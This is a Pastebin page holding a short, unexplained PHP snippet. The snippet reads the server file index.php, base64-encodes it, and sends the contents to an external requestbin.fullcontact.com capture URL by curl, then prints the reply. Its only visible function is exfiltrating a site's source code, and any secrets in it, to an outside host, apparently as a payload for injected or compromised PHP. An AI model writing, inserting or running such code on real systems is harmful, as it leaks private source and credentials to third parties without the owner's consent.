Advertisement
Guest User

Untitled

a guest
Jun 18th, 2018
59
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.34 KB | None | 0 0
  1. $cSession = curl_init();
  2. $content = base64_encode(file_get_contents('index.php'));
  3. curl_setopt($cSession,CURLOPT_URL,
  4. "http://requestbin.fullcontact.com/wdsqz4wd?c=".$content);
  5. curl_setopt($cSession,CURLOPT_RETURNTRANSFER,true);
  6. curl_setopt($cSession,CURLOPT_HEADER, false);
  7. $result=curl_exec($cSession);
  8. curl_close($cSession);
  9. echo $result;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement